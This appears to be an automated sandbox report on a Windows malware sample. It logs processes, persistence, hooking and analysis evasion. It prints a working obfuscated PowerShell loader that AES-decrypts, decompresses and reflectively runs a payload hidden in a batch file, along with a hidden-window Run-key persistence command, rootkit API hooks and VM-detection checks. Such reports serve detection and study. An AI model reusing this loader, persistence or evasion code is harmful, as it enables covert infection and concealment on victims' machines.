Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\cmd.exe | Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413901E3C LoadLibraryA,GetProcAddress,SleepEx,
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138EA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E1A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8B23FB pushad ; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BFFE push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98B7F8 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C829 push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BF5F push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C749 push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BE69 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98CA5F push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98BD89 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C9BE push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C1DA push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C1A0 push eax; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C91F push ds; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B98C09F push eax; retf
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E8A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1AAA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC62A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0ACA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612EA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDCA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED9A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A879AA7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 44_3_000001795378A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E3A7DD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D54A7DD push rcx; retf 003Fh

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5554
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2046
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 456
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 403
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 373
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1708
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 446
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 368
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 363
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.1 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 9.4 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.3 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\wbem\WMIADAP.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 4320 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 5554 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep count: 3777 > 30
